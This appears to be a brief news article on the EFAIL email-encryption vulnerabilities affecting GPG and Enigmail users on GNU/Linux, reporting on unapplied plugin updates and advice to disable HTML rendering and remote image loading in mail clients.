Back in May, a technical paper published by EFAIL encouraged users to cease using GNU Privacy Guard (GPG) plugins when they wanted to encrypt email. As with many open-source products made by GNU developers, GPG is widely used by those who run GNU/Linux in a desktop or laptop environment and this made the paper rather concerning.
The Electronic Frontier Foundation has also raised concerns about several new vulnerabilities in GPG software during the last month or so, which had reminded many Linux security experts of those views expressed in the paper. A few GNU/Linux specialists went so far as to simply suggest that encrypted email can never be truly considered safe.
Fortunately, open-source experts released further recommendations recently that might sit better with those who have relied on GPG tools to send encrypted email to other GNU/Linux users. Experts had stated as early as Thursday that any mail client that renders HTML, loads images automatically or accepts remote media without permission are what actually cause these vulnerabilities. The problem, however, is that it seems many haven’t taken advantage of them.
Enigmail, a popular GPG plugin designed to work with Thunderbird, received an update shortly after the EFAIL report was released to the public. As of today June 9, many users who run Thunderbird on GNU/Linux have yet to install said update despite the update being nearly a month old at this point. Since these plugins don’t often update when repository packages do, those who are using all of the latest packages from early June on Debian or Ubuntu may still be at risk if they haven’t taken the time to manually update the plugin even if they’re current with all other upgrades.
The latest list of recommendations have stated that disabling HTML rendering and image loading will defeat most of the vulnerabilities, which aren’t actually directly related to the GPG package itself. Interestingly enough, Engimail’s developers now make this recommendation as well since disabled HTML support coupled with encryption makes for a much more secure email experience.
Interestingly, since encrypted email has to be specifically targeted by attackers, a greater volume of encrypted email sent on the Internet would help reduce the risk that any targeted attacks would work.